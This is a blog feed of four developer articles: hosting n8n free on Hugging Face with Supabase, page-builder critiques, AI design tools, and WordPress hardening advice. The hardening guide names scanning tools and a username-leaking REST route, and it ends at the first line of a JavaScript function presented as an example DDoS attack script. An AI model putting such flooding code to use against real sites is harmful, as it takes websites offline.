<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/">
  <channel>
    <title>DEV Community: And Go Web Solutions | AGWS</title>
    <description>The latest articles on DEV Community by And Go Web Solutions | AGWS (@agws).</description>
    <link>https://dev.to/agws</link>
    <image>
      <url>https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F895326%2F800be58e-bf7f-4883-a8a0-1213ff828ee9.png</url>
      <title>DEV Community: And Go Web Solutions | AGWS</title>
      <link>https://dev.to/agws</link>
    </image>
    <atom:link rel="self" type="application/rss+xml" href="https://dev.to/feed/agws"/>
    <language>en</language>
    <item>
      <title>Setup N8N For Free with Supabase No Credit Card Verification Needed.</title>
      <dc:creator>And Go Web Solutions | AGWS</dc:creator>
      <pubDate>Tue, 24 Mar 2026 19:10:09 +0000</pubDate>
      <link>https://dev.to/agws/setup-n8n-for-free-with-supabase-no-credit-card-verification-needed-4pej</link>
      <guid>https://dev.to/agws/setup-n8n-for-free-with-supabase-no-credit-card-verification-needed-4pej</guid>
      <description>&lt;h1&gt;
  
  
  🚀 Deploy n8n for FREE (No Credit Card Needed) – Full Tutorial
&lt;/h1&gt;

&lt;p&gt;Tired of being asked for a credit card just to try cloud hosting? Want to run your own automation server without paying a dime? In this guide, I'll show you how to deploy &lt;strong&gt;n8n&lt;/strong&gt; – a powerful open‑source workflow tool – on &lt;strong&gt;Hugging Face Spaces&lt;/strong&gt; with a &lt;strong&gt;free Supabase database&lt;/strong&gt;. No credit card required, and you get 16 GB of RAM, 2 vCPUs, and automatic HTTPS out of the box. Let’s dive in!&lt;/p&gt;




&lt;h2&gt;
  
  
  What You’ll Need
&lt;/h2&gt;

&lt;p&gt;We’ll use three free services, all with email‑only signup:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;&lt;a href="https://huggingface.co/" rel="noopener noreferrer"&gt;Hugging Face Spaces&lt;/a&gt;&lt;/strong&gt; – our hosting platform (gives us a free &lt;code&gt;yourname.hf.space&lt;/code&gt; domain with SSL)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;&lt;a href="https://supabase.com/" rel="noopener noreferrer"&gt;Supabase&lt;/a&gt;&lt;/strong&gt; – our PostgreSQL database (free tier is plenty for n8n)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;n8n template&lt;/strong&gt; – a ready‑to‑run Space we’ll duplicate&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;No terminal, no Docker commands – just a few clicks and some environment variables.&lt;/p&gt;




&lt;h2&gt;
  
  
  Step 1: Duplicate the n8n Space
&lt;/h2&gt;

&lt;p&gt;First, create a Hugging Face account – just your email. Then go to this link:&lt;br&gt;&lt;br&gt;
&lt;a href="https://huggingface.co/spaces/tomowang/n8n" rel="noopener noreferrer"&gt;&lt;code&gt;huggingface.co/spaces/tomowang/n8n&lt;/code&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Click &lt;strong&gt;“Duplicate this Space”&lt;/strong&gt;, give it a name (e.g., &lt;code&gt;my-n8n-space&lt;/code&gt;), set visibility to &lt;strong&gt;Public&lt;/strong&gt;, and hit duplicate. That’s it – your Space is created, but it’s not running yet because we need to connect a database.&lt;/p&gt;


&lt;h2&gt;
  
  
  Step 2: Set Up Supabase Database
&lt;/h2&gt;

&lt;p&gt;Head to &lt;a href="https://supabase.com/" rel="noopener noreferrer"&gt;Supabase&lt;/a&gt;, sign up (again, just email), and create a new project.&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Pick a name, set a strong database password – &lt;strong&gt;save it!&lt;/strong&gt;
&lt;/li&gt;
&lt;li&gt;Choose a region close to you&lt;/li&gt;
&lt;li&gt;Wait a minute for it to initialise&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Once ready, go to &lt;strong&gt;Project Settings → Database&lt;/strong&gt;. Scroll down to &lt;strong&gt;Connection string&lt;/strong&gt; and find the &lt;strong&gt;Transaction pooler&lt;/strong&gt; section. This is the secret sauce.&lt;/p&gt;

&lt;p&gt;Click &lt;strong&gt;‘Transaction pooler’&lt;/strong&gt; and copy the host, port, user, and database. Your host will look something like:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;code&gt;aws-1-eu-west-1.pooler.supabase.com&lt;/code&gt; or &lt;code&gt;db.xxxxx.supabase.co&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;Port is &lt;strong&gt;6543&lt;/strong&gt;
&lt;/li&gt;
&lt;li&gt;User is &lt;code&gt;postgres&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;Database is &lt;code&gt;postgres&lt;/code&gt;
&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Keep these handy – we’ll use them in the next step.&lt;/p&gt;


&lt;h2&gt;
  
  
  Step 3: Environment Variables – The Heart of the Setup
&lt;/h2&gt;

&lt;p&gt;Go back to your Hugging Face Space → &lt;strong&gt;Settings&lt;/strong&gt; → &lt;strong&gt;Variables and secrets&lt;/strong&gt;. This is where we tell n8n how to find the database and how to behave.&lt;/p&gt;

&lt;p&gt;We’ll add two &lt;strong&gt;secrets&lt;/strong&gt; (private) and several &lt;strong&gt;public variables&lt;/strong&gt;.&lt;/p&gt;
&lt;h3&gt;
  
  
  Secrets (private)
&lt;/h3&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;code&gt;N8N_ENCRYPTION_KEY&lt;/code&gt; – a random 32‑character string. Generate one in your terminal with
&lt;/li&gt;
&lt;/ol&gt;
&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;   openssl rand &lt;span class="nt"&gt;-base64&lt;/span&gt; 32
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;


&lt;p&gt;or use an online generator.&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;code&gt;DB_POSTGRESDB_PASSWORD&lt;/code&gt; – the password you saved from Supabase.&lt;/li&gt;
&lt;/ol&gt;
&lt;h3&gt;
  
  
  Public variables
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;code&gt;N8N_EDITOR_BASE_URL&lt;/code&gt; = &lt;code&gt;https://YOUR-SPACE-NAME.hf.space/&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;WEBHOOK_URL&lt;/code&gt; = same as above&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;N8N_PROTOCOL&lt;/code&gt; = &lt;code&gt;https&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;N8N_PORT&lt;/code&gt; = &lt;strong&gt;7860&lt;/strong&gt;  &lt;em&gt;(this is critical – Hugging Face expects port 7860)&lt;/em&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;DB_POSTGRESDB_HOST&lt;/code&gt; = the host from Supabase (transaction pooler)&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;DB_POSTGRESDB_PORT&lt;/code&gt; = &lt;code&gt;6543&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;DB_POSTGRESDB_USER&lt;/code&gt; = &lt;code&gt;postgres&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;DB_POSTGRESDB_DATABASE&lt;/code&gt; = &lt;code&gt;postgres&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;DB_TYPE&lt;/code&gt; = &lt;code&gt;postgresdb&lt;/code&gt; (optional but safe)&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;GENERIC_TIMEZONE&lt;/code&gt; = your local timezone (e.g., &lt;code&gt;Europe/Berlin&lt;/code&gt;)&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;EXECUTIONS_DATA_PRUNE&lt;/code&gt; = &lt;code&gt;true&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;EXECUTIONS_DATA_MAX_AGE&lt;/code&gt; = &lt;code&gt;72&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;EXECUTIONS_DATA_SAVE_ON_ERROR&lt;/code&gt; = &lt;code&gt;all&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;EXECUTIONS_DATA_SAVE_ON_SUCCESS&lt;/code&gt; = &lt;code&gt;none&lt;/code&gt;
&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Delete these if they exist:&lt;/strong&gt; &lt;code&gt;HTTP_PROXY&lt;/code&gt;, &lt;code&gt;HTTPS_PROXY&lt;/code&gt;, &lt;code&gt;NODE_TLS_REJECT_UNAUTHORIZED&lt;/code&gt;, &lt;code&gt;N8N_HOST&lt;/code&gt;. They cause connection problems.&lt;/p&gt;


&lt;h2&gt;
  
  
  Alternative: Single DATABASE_URL
&lt;/h2&gt;

&lt;p&gt;If you want to avoid managing all those &lt;code&gt;DB_POSTGRESDB_*&lt;/code&gt; variables, you can replace them with a single secret called &lt;code&gt;DATABASE_URL&lt;/code&gt;. Simply delete all the &lt;code&gt;DB_POSTGRESDB_*&lt;/code&gt; variables, then add a secret with the full connection string from Supabase (transaction pooler). It looks like this:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight sql"&gt;&lt;code&gt;&lt;span class="n"&gt;postgresql&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="o"&gt;//&lt;/span&gt;&lt;span class="n"&gt;postgres&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="n"&gt;YOUR_PASSWORD&lt;/span&gt;&lt;span class="o"&gt;@&lt;/span&gt;&lt;span class="n"&gt;YOUR_HOST&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="mi"&gt;6543&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="n"&gt;postgres&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;That’s it – much cleaner.&lt;/p&gt;




&lt;h2&gt;
  
  
  Step 4: Restart and Watch the Logs
&lt;/h2&gt;

&lt;p&gt;Once all variables are set, go to the &lt;strong&gt;App&lt;/strong&gt; tab, click the three dots, and select &lt;strong&gt;‘Restart this Space’&lt;/strong&gt;. Wait a moment, then open the &lt;strong&gt;Logs&lt;/strong&gt; section.&lt;/p&gt;

&lt;p&gt;You’re looking for a line that says:&lt;br&gt;&lt;br&gt;
&lt;code&gt;n8n ready on ::, port 7860&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;If you see that, your Space is live!&lt;/p&gt;




&lt;h2&gt;
  
  
  Step 5: Access n8n and Create Admin Account
&lt;/h2&gt;

&lt;p&gt;Now open your Space URL: &lt;code&gt;https://YOUR-SPACE-NAME.hf.space&lt;/code&gt;. You’ll see the n8n login page. Click ‘Sign up’ and create your admin account. Congratulations – you’re now running n8n for free!&lt;/p&gt;




&lt;h2&gt;
  
  
  Troubleshooting Common Errors
&lt;/h2&gt;

&lt;p&gt;If things go wrong, here’s how to fix them:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;&lt;code&gt;No encryption key found&lt;/code&gt;&lt;/strong&gt; – make sure you added the &lt;code&gt;N8N_ENCRYPTION_KEY&lt;/code&gt; secret. Re‑add it and restart.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;&lt;code&gt;connect ENETUNREACH … :5432&lt;/code&gt;&lt;/strong&gt; – you’re using the wrong port. Set &lt;code&gt;DB_POSTGRESDB_PORT&lt;/code&gt; to &lt;code&gt;6543&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;&lt;code&gt;Tenant or user not found&lt;/code&gt;&lt;/strong&gt; – your database host, user, or password is wrong. Double‑check the transaction pooler details in Supabase.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;404 when visiting your Space&lt;/strong&gt; – most likely n8n is listening on the wrong port. Make sure &lt;code&gt;N8N_PORT=7860&lt;/code&gt; and restart.&lt;/li&gt;
&lt;/ul&gt;




&lt;h2&gt;
  
  
  Why This Works &amp;amp; Bonus Tips
&lt;/h2&gt;

&lt;p&gt;Hugging Face Spaces gives you a free domain, SSL, and more resources than most free cloud VMs. Supabase’s transaction pooler makes the connection stable even on the free tier. Your workflows are stored in Supabase, so they survive restarts.&lt;/p&gt;

&lt;p&gt;If you ever want to upgrade n8n, simply edit the &lt;code&gt;Dockerfile&lt;/code&gt; in your Space’s files and change the image tag, or re‑duplicate the latest template.&lt;/p&gt;




&lt;h2&gt;
  
  
  That’s It!
&lt;/h2&gt;

&lt;p&gt;You now have a fully functional automation server at zero cost. If this helped you, feel free to share it or drop a comment if you have any questions. Happy automating!&lt;/p&gt;




&lt;h3&gt;
  
  
  Useful Links
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;n8n template (direct duplicate link): &lt;a href="https://huggingface.co/spaces/baoyin2024/n8n-free?duplicate=true" rel="noopener noreferrer"&gt;https://huggingface.co/spaces/baoyin2024/n8n-free?duplicate=true&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;Supabase: &lt;a href="https://supabase.com" rel="noopener noreferrer"&gt;supabase.com&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;n8n documentation: &lt;a href="https://docs.n8n.io" rel="noopener noreferrer"&gt;docs.n8n.io&lt;/a&gt;
&lt;/li&gt;
&lt;/ul&gt;

</description>
      <category>automation</category>
      <category>beginners</category>
      <category>opensource</category>
      <category>tutorial</category>
    </item>
    <item>
      <title>Page Builders You Wont Like as Developer</title>
      <dc:creator>And Go Web Solutions | AGWS</dc:creator>
      <pubDate>Sat, 17 Jan 2026 05:24:17 +0000</pubDate>
      <link>https://dev.to/agws/page-builders-you-wont-like-as-developer-3imc</link>
      <guid>https://dev.to/agws/page-builders-you-wont-like-as-developer-3imc</guid>
      <description>&lt;p&gt;Framer, Carrd, GHL: A Developer's Brutally Honest Take&lt;br&gt;
Let's cut through the marketing. You're a developer being asked to build or maintain a site on one of these platforms. Here's what you're actually signing up for, where each one will make you want to pull your hair out, and what you should use instead.&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Framer: The Designer's Toy
Framer markets itself as the revolutionary web tool for designers. And it is—for designers. For anyone trying to build a real, content-managed website, it's a pain.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;The "Simple" Illusion: Yes, the visual editor is slick. Dragging components feels great... until you need to connect it to real data.&lt;/p&gt;

&lt;p&gt;Dynamic CMS is an Afterthought: This is the deal-breaker. Framer's CMS feels bolted on as an aftermarket part. Managing collections, references, and rich text is clunky and unintuitive compared to any dedicated CMS. It's a constant context switch between design mode and a cramped data panel.&lt;/p&gt;

&lt;p&gt;Hostage Pricing Model: Need more than one CMS collection type on the starter plan? Tough. Want to add a client or a content editor as a contributor? That's an extra $20/month per person. This makes it financially insane for any project with a team.&lt;/p&gt;

&lt;p&gt;The "Advantage": The ready-made components are nice, but that's table stakes. Every other tool has these now.&lt;/p&gt;

&lt;p&gt;💀 The Verdict: Use Framer for prototyping or ultra-simple brochure sites where you hand off a static design. For anything content-driven or collaborative, you're in for a world of friction.&lt;/p&gt;

&lt;p&gt;🚀 Developer Alternatives:&lt;/p&gt;

&lt;p&gt;Webflow: If you need no-code design freedom with a powerful, native CMS. It has a steeper learning curve but outputs clean, production-ready code.&lt;/p&gt;

&lt;p&gt;WordPress (Headless): For ultimate control. Pair a modern frontend (Next.js, Nuxt) with WordPress as a headless CMS via its API. You get Framer-like flexibility in your stack with WP's unbeatable content management. It's often cheaper and has zero limits on users or content types.&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Carrd.co: It Does One Thing. That's It.
Carrd is brilliant at its singular purpose: making a good-looking, single-page site in 5 minutes. No more, no less.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;The 1-Page Wall: This is its core feature and its fatal flaw. The moment you need an "About" page and a "Blog" page, you've outgrown Carrd.&lt;/p&gt;

&lt;p&gt;SEO is a Non-Starter: A single-page site is terrible for building topical authority. Your ability to optimize is severely limited.&lt;/p&gt;

&lt;p&gt;The $19/Year Trap: The price is compelling. But if you know HTML/CSS/JS, you're paying for convenience you don't need. You can build something better yourself.&lt;/p&gt;

&lt;p&gt;💀 The Verdict: Perfect for a quick, disposable landing page or a personal link-in-bio. A terrible choice for any business, portfolio, or project meant to grow.&lt;/p&gt;

&lt;p&gt;🚀 Developer Alternative: Go Static.&lt;br&gt;
This is the key point. You are the target market for the alternative.&lt;/p&gt;

&lt;p&gt;Build it yourself: Write the HTML/CSS. Use a static site generator like 11ty, Hugo, or Astro for more power.&lt;/p&gt;

&lt;p&gt;Host it for free (or pennies): Deploy it to Cloudflare Pages, Netlify, or Vercel. Connect your custom domain. You get:&lt;/p&gt;

&lt;p&gt;Better performance (global CDN).&lt;/p&gt;

&lt;p&gt;Perfect SEO control (clean URLs, meta tags, sitemaps).&lt;/p&gt;

&lt;p&gt;Zero lock-in. Your site is just files.&lt;/p&gt;

&lt;p&gt;A similar or lower cost than Carrd's $19/year (often free for basic sites).&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;GoHighLevel (GHL): The Marketing Beast
GHL is not a website builder; it's an all-in-one marketing and CRM platform. Judging it as a website tool is missing the point, but its builder is where developers get brought in.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;It Shines for Sales Funnels: The booking system, SMS/email automation, and pipeline management are its raison d'être. For a service business, it's powerful.&lt;/p&gt;

&lt;p&gt;The Developer Experience Sucks: The website/funnel builder is utilitarian. It's built for speed and conversion, not clean code or elegant design. Implementing custom visuals or complex interactions is a fight against the platform. It feels outdated and restrictive.&lt;/p&gt;

&lt;p&gt;💀 The Verdict: Use GHL for what it's best at: marketing automation, CRM, and booking. Do not use it as your primary website if design or custom functionality matters.&lt;/p&gt;

&lt;p&gt;🚀 Developer Strategy: Decouple.&lt;br&gt;
Build your main, public-facing website on WordPress or Webflow for design control and SEO. Use GHL purely for its marketing superpowers—embed its booking widget or tracking code on your site. This gives you the best of both worlds.&lt;/p&gt;

&lt;p&gt;The Takeaway: Use the Right Tool for the Job&lt;br&gt;
Platform    Real Developer Pain Points  What to Use Instead&lt;br&gt;
Framer  Cumbersome CMS, outrageous contributor fees.    Webflow (for design+CMS) or Headless WordPress (for control).&lt;br&gt;
Carrd   One-page limit, zero scalability.   A static site you build &amp;amp; host on Cloudflare/Netlify.&lt;br&gt;
GoHighLevel Clunky, restrictive builder for custom work.    WordPress/Webflow for main site, GHL only for funnels/CRM.&lt;br&gt;
Stop trying to make platforms do things they hate. For developers, the "better alternative" is often to bypass the proprietary tool entirely and own your stack.&lt;/p&gt;

</description>
      <category>framer</category>
      <category>carrd</category>
      <category>ghl</category>
      <category>pagebuilders</category>
    </item>
    <item>
      <title>Top AI Tools for Developers &amp; Designers</title>
      <dc:creator>And Go Web Solutions | AGWS</dc:creator>
      <pubDate>Fri, 14 Mar 2025 12:43:46 +0000</pubDate>
      <link>https://dev.to/agws/top-ai-tools-for-developers-designers-51h6</link>
      <guid>https://dev.to/agws/top-ai-tools-for-developers-designers-51h6</guid>
      <description>&lt;p&gt;In today’s fast-paced digital world, AI-powered tools are revolutionizing the way developers and designers work. Whether you're looking to convert screenshots into code, generate stunning color palettes, or create professional logos in seconds, AI is making it easier than ever.&lt;/p&gt;

&lt;p&gt;In this article, we’ll explore the best AI tools that can enhance your workflow and boost productivity in UI/UX design, front-end development, and branding. Let’s dive in! 🌊&lt;/p&gt;

&lt;p&gt;🎯 Top AI Tools for Developers &amp;amp; Designers&lt;/p&gt;

&lt;p&gt;🔥 1. V0 by Vercel - AI-Powered UI Component Builder&lt;br&gt;
📌 Website: V0 by Vercel&lt;/p&gt;

&lt;p&gt;🔹 What It Does: V0 uses AI to generate React components in seconds, saving front-end developers hours of work. Instead of manually writing UI components, just describe what you need in plain English—and V0 will generate high-quality, production-ready code.&lt;/p&gt;

&lt;p&gt;🔹 Best Use Cases:&lt;br&gt;
✅ Quickly generate UI components for Next.js and React apps&lt;br&gt;
✅ Speed up development with pre-built, AI-generated designs&lt;br&gt;
✅ Easily customize and export directly into your codebase&lt;/p&gt;

&lt;p&gt;💡 Pro Tip: Combine V0 with Tailwind CSS for a sleek and responsive design system! 🚀&lt;/p&gt;

&lt;p&gt;🖌 2. Visily.ai - Convert Screenshots to Figma Instantly&lt;br&gt;
📌 Website: Visily.ai&lt;/p&gt;

&lt;p&gt;🔹 What It Does: If you’ve ever had a great idea sketched on paper or a screenshot of a UI you love, Visily converts it into editable Figma designs with AI-powered wireframing.&lt;/p&gt;

&lt;p&gt;🔹 Best Use Cases:&lt;br&gt;
✅ Convert low-fidelity sketches into high-fidelity UI mockups&lt;br&gt;
✅ Transform screenshots into editable Figma layers&lt;br&gt;
✅ Collaborate in real time with your team on design ideas&lt;/p&gt;

&lt;p&gt;🎯 Who Should Use It?&lt;br&gt;
✅ UI/UX Designers&lt;br&gt;
✅ Product Managers&lt;br&gt;
✅ Front-End Developers looking for faster prototyping&lt;/p&gt;

&lt;p&gt;💡 Pro Tip: Use Visily to turn hand-drawn wireframes into digital designs in seconds! 🖍✨&lt;/p&gt;

&lt;p&gt;💻 3. BlackBox.ai - Screenshot to Code in One Click!&lt;br&gt;
📌 Website: BlackBox.ai&lt;/p&gt;

&lt;p&gt;🔹 What It Does: This AI tool takes a screenshot of a website or UI and converts it into functional code. No more manually inspecting elements!&lt;/p&gt;

&lt;p&gt;🔹 Best Use Cases:&lt;br&gt;
✅ Convert screenshots of websites into actual HTML/CSS/JS code&lt;br&gt;
✅ Extract code snippets from images and PDFs&lt;br&gt;
✅ Generate SQL queries from natural language prompts&lt;/p&gt;

&lt;p&gt;🎯 Who Should Use It?&lt;br&gt;
✅ Front-End Developers&lt;br&gt;
✅ Web Scrapers &amp;amp; Data Engineers&lt;br&gt;
✅ AI Enthusiasts Automating Tasks&lt;/p&gt;

&lt;p&gt;💡 Pro Tip: Use BlackBox alongside ChatGPT for even better code refinement! 🔥&lt;/p&gt;

&lt;p&gt;🎨 4. Color Magic - AI-Powered Color Palette Generator&lt;br&gt;
📌 Website: Color Magic&lt;/p&gt;

&lt;p&gt;🔹 What It Does: Need the perfect color palette for your website, app, or branding? Color Magic generates AI-driven color schemes based on mood, theme, and industry trends.&lt;/p&gt;

&lt;p&gt;🔹 Best Use Cases:&lt;br&gt;
✅ Generate custom color palettes for web &amp;amp; mobile apps&lt;br&gt;
✅ Get harmonious color combinations for branding&lt;br&gt;
✅ Create beautiful gradient backgrounds&lt;/p&gt;

&lt;p&gt;🎯 Who Should Use It?&lt;br&gt;
✅ Graphic Designers&lt;br&gt;
✅ UI/UX Designers&lt;br&gt;
✅ Web Developers&lt;/p&gt;

&lt;p&gt;💡 Pro Tip: Try "Dark Mode" themes for modern UI designs! 🌑🔥&lt;/p&gt;

&lt;p&gt;🏆 5. Adobe Free Logo Generator - Instant AI Branding&lt;br&gt;
📌 Website: Adobe Logo Generator&lt;/p&gt;

&lt;p&gt;🔹 What It Does: No design experience? No problem! Adobe’s AI-powered logo generator lets you create stunning logos in minutes.&lt;/p&gt;

&lt;p&gt;🔹 Best Use Cases:&lt;br&gt;
✅ Startups &amp;amp; Small Businesses needing professional logos&lt;br&gt;
✅ Developers launching new side projects&lt;br&gt;
✅ Freelancers &amp;amp; Creators looking for quick branding&lt;/p&gt;

&lt;p&gt;🎯 Who Should Use It?&lt;br&gt;
✅ Business Owners&lt;br&gt;
✅ Content Creators&lt;br&gt;
✅ Designers &amp;amp; Freelancers&lt;/p&gt;

&lt;p&gt;💡 Pro Tip: Customize fonts, colors, and icons for a unique touch! 🔥&lt;/p&gt;

&lt;p&gt;📢 Bonus: Discover What Websites Are Built With! 🔍&lt;br&gt;
Want to analyze a website's tech stack? Use Wappalyzer to discover:&lt;br&gt;
✅ What framework (React, Vue, Angular) a website is using&lt;br&gt;
✅ What CMS (WordPress, Shopify, Webflow) is behind the scenes&lt;br&gt;
✅ What analytics, marketing, and security tools are running&lt;/p&gt;

&lt;p&gt;💡 Pro Tip: Use Wappalyzer to reverse-engineer successful websites and learn best practices! 🔥&lt;/p&gt;

&lt;p&gt;⚠️ Important Notice on AI Tools &amp;amp; Ethics&lt;br&gt;
While AI-powered tools are powerful, it’s essential to use them responsibly:&lt;br&gt;
✔ Always double-check AI-generated code for security vulnerabilities&lt;br&gt;
✔ Customize AI designs to maintain originality&lt;br&gt;
✔ Respect copyright &amp;amp; licensing when using AI-generated content&lt;/p&gt;

&lt;p&gt;🔹 AI should enhance human creativity, not replace it. 🚀&lt;/p&gt;

&lt;p&gt;🎬 Final Thoughts: Level Up Your Workflow!&lt;br&gt;
These AI tools are game-changers for developers, designers, and creators! Whether you're building UI components, generating code, designing logos, or picking colors, AI can save you hours of work and help you focus on what truly matters.&lt;/p&gt;

&lt;p&gt;🚀 Which AI tool is your favorite? Drop a comment below! 💬👇&lt;/p&gt;

&lt;p&gt;🔔 Don’t forget to bookmark this article &amp;amp; share it with fellow developers &amp;amp; designers! 📢🔥&lt;/p&gt;

</description>
      <category>ai</category>
      <category>webdev</category>
      <category>ui</category>
      <category>ux</category>
    </item>
    <item>
      <title>After More than 5 Years of Maintaining WordPress Websites, Here’s What I’ve Learned</title>
      <dc:creator>And Go Web Solutions | AGWS</dc:creator>
      <pubDate>Thu, 23 Jan 2025 18:05:38 +0000</pubDate>
      <link>https://dev.to/agws/after-more-than-5-years-of-maintaining-wordpress-websites-heres-what-ive-learned-3in5</link>
      <guid>https://dev.to/agws/after-more-than-5-years-of-maintaining-wordpress-websites-heres-what-ive-learned-3in5</guid>
      <description>&lt;h1&gt;
  
  
  Introduction
&lt;/h1&gt;

&lt;p&gt;If someone tells you, "Don’t worry, my website is secure," then you’re not paranoid enough—this guide is for you. As scammers and hackers become increasingly sophisticated, securing your WordPress website is more critical than ever. Below, I’ve compiled a practical guide to help you mitigate common WordPress vulnerabilities and exploits.&lt;/p&gt;




&lt;h2&gt;
  
  
  1. Use Secure and Maintained WordPress Themes
&lt;/h2&gt;

&lt;h3&gt;
  
  
  Avoid Stolen Plugins or Themes
&lt;/h3&gt;

&lt;p&gt;Never use pirated or unsupported themes or plugins—they’re often compromised. Avoid one-off sales for plugins if they don’t offer ongoing support.  &lt;/p&gt;

&lt;h3&gt;
  
  
  Choose Well-Maintained Themes
&lt;/h3&gt;

&lt;p&gt;Opt for themes that are regularly updated and supported. For corporate projects, consider using themes provided or adapted through &lt;a href="https://wpvip.com/" rel="noopener noreferrer"&gt;WPVIP&lt;/a&gt; for enhanced security and support.  &lt;/p&gt;

&lt;h3&gt;
  
  
  Use WordPress as a Headless CMS
&lt;/h3&gt;

&lt;p&gt;Modern tools like &lt;a href="https://nextjs.org/" rel="noopener noreferrer"&gt;NextJS&lt;/a&gt; and the &lt;a href="https://developer.wordpress.org/rest-api/" rel="noopener noreferrer"&gt;WP Rest API&lt;/a&gt; allow you to use WordPress as a backend while leveraging the power of front-end frameworks like React or Angular. This approach can improve performance and security.&lt;/p&gt;




&lt;h2&gt;
  
  
  2. Implement Robust Security Measures
&lt;/h2&gt;

&lt;h3&gt;
  
  
  Regular Maintenance
&lt;/h3&gt;

&lt;p&gt;Always keep WordPress core, themes, and plugins up to date. Security patches and updates are essential to protect against known vulnerabilities.  &lt;/p&gt;

&lt;h3&gt;
  
  
  Web Penetration Testing
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;WPScan&lt;/strong&gt;: Use this tool to scan for WordPress-specific vulnerabilities.
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;BurpSuite&lt;/strong&gt;: Perform security inspections on headers and cookies.
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Nmap&lt;/strong&gt;: Run Nmap on your server’s IP to check for unnecessary open ports (e.g., SSH or WP-CLI). Restrict or disable these ports if not needed.
&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  SSH &amp;amp; WP-CLI Hardening
&lt;/h3&gt;

&lt;p&gt;Lock down SSH access and handle WP-CLI carefully to prevent potential exploits.  &lt;/p&gt;

&lt;h3&gt;
  
  
  Disable Unused API Routes
&lt;/h3&gt;

&lt;p&gt;Turn off any API endpoints you aren’t using to limit exposure. For example, disable &lt;code&gt;rest_route=/wp/v2/users&lt;/code&gt; to prevent username leaks.  &lt;/p&gt;

&lt;h3&gt;
  
  
  Scan for Leaked Information
&lt;/h3&gt;

&lt;p&gt;Regularly check posts, comments, and other content for accidentally exposed usernames or sensitive data.  &lt;/p&gt;




&lt;h2&gt;
  
  
  3. Rate Limit Users
&lt;/h2&gt;

&lt;p&gt;Your users don’t need unlimited requests. Implement rate limiting to prevent abuse. For example, limit requests to 500 per minute and block excessive traffic. This can help mitigate DDoS attacks.  &lt;/p&gt;

&lt;h3&gt;
  
  
  Example of a DDoS Attack Script
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight javascript"&gt;&lt;code&gt;&lt;span class="kd"&gt;function&lt;/span&gt; &lt;span class="nf"&gt;floodImagesXYZ&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
